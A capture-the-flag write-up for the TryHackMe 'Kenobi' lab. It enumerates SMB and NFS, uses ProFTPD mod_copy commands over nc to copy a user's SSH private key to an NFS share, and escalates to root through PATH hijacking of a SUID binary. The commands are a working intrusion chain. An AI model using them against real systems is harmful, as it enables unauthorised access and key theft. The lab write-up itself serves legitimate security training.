# TryHackMe Kenobi writeup

[Kenobi](https://tryhackme.com/room/kenobi) is the third machine in TryHackMe’s “Offensive pentesting” path.

# Enumeration

Starting with `nmap` scan:

```bash
nmap -sC -sV 10.10.232.217

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu 
2049/tcp open  nfs_acl     2-3 (RPC #100227)
```

So, we have Samba on this machine. Samba is the standard Windows interoperability suite of programs for Linux and Unix. Let’s enumerate it closer with `NSE` scripts of `nmap`:

```bash
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.232.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 07:04 EDT
Nmap scan report for 10.10.232.217
Host is up (0.086s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.232.217\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.232.217\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.232.217\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds
```

Let’s connect to the `\\10.10.232.217\anonymous` share:

```bash
smbclient //10.10.232.217/anonymous
```

or you can use `smbget` to download the share:

```bash
smbget -R smb://10.10.232.217/anonymous
```

Only one file is there. By opening this file, we can learn that `id_rsa` file can be found at `/home/kenobi/.ssh/id_rsa`.

Let’s more closely look at the FTP server now. `Nmap` highlighted that the `ProFTPD 1.3.5` is running on port `21`.

If search for the available exploits, we can find a few:

```bash
searchsploit ProFTPD 1.3.5


ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)|         linux/remote/37262.rb

ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution|         linux/remote/36803.py
ProFTPd 1.3.5 - File Copy|         linux/remote/36742.txt
```

The version is matched, and we can see that `mod_copy` one even has the Metasploit module. But we don’t really need it. Let’s read the exploit and the [official documentation](http://www.proftpd.org/docs/contrib/mod_copy.html) instead. We can learn from it that the `mod_copy` module implements `SITE CPFR` and `SITE CPTO` commands, which can be used to copy files on the machine. We are also the `rpcbind` running on the port `111`, let’s enumerate it too:

```bash
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.232.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 06:42 EDT
Nmap scan report for 10.10.232.217
Host is up (0.046s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds                                                          
```

Great. Now we know that it’s possible to mount `/var` folder on the machine, and we potentially have a way to copy some files to it.

---

# Exploitation

Connect to the port `21` with the `nc` and try to use `mod_copy` commands:

```bash
nc 10.10.232.217 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.232.217]
SITE CPFR /home/kenobi/.id_rsa
550 /home/kenobi/.id_rsa: No such file or directory
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
```

Awesome, we now have SSH key in the `/var` folder. Let’s mount it and grab it:

```bash
sudo mkdir /mnt/kenobiNFS
sudo mount 10.10.232.217:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Oct  9 06:45 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Oct  9 06:34 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www
```

Now we should try to use this SSH key, as we know the username too. Copy the SSH key to some folder, and add the `chmod 600` to it:

```bash
cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.232.217

kenobi@kenobi:~$ whoami
kenobi
```

---

# PrivEsc

All the “standard” enumeration scripts will pick that up, but it’s good to know how to do things by hand.

The following command can locate all the files with [SUID](https://www.linux.com/training-tutorials/what-suid-and-how-set-suid-linuxunix/) bit (which means that they will be executed with the root permissions):

```bash
find / -perm -u=s -type f 2>/dev/null
```

By reviewing the output, we can say that `/usr/bin/menu` is standing out a bit. You can use the command `strings` to examine the binary:

```bash
kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
```

It’s quite messy, but don’t worry. Just read it line by line and try to make sense of it. If you try to run the binary, you will see the following:

```bash
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
```

In the `strings` output, we have this chunk of code right after it:

```bash
curl -I localhost
uname -r
ifconfig
```

Noticed that it’s calling the `curl` without specifying the absolute path? That should ring a bell for you, as this is our way in. To move forward, you need to understand how $PATH in Linux works. [That](http://www.linfo.org/path_env_var.html) might be good reading. Let’s do the trick:

```bash
kenobi@kenobi:/tmp$ echo /bin/bash > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# whoami
root
```

Hooray! We have a root shell!

Take a second to understand what we did here. We created a file named `curl` with a string `/bin/bash` in it. We exported the `/tmp` folder into the `$PATH` variable, do the `/usr/bin/menu` will start to look for a binary named `curl` in it first. Let’s check the `$PATH` to make sure:

```bash
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```

As the `/usr/bin/menu` is not specified the absolute path of the binary `curl`, it will start looking for it in each location from the `$PATH`. `/tmp`, `/home/kenobi/bin`, `/home/kenobi/.local/bin`, etc. As we have our “fake” `curl` inside the first folder, and the `/usr/bin/menu` is executing with the `root` privileges, we get the root shell.

---

# Takeaway

* Enumerate every service that you have on the machine.
    
* Sometimes reading the documentation for the product is way faster than the exploit.
    
* You shouldn’t rely only on Metasploit if there is a `Metasploit` module, that means you can do the same thing manually.
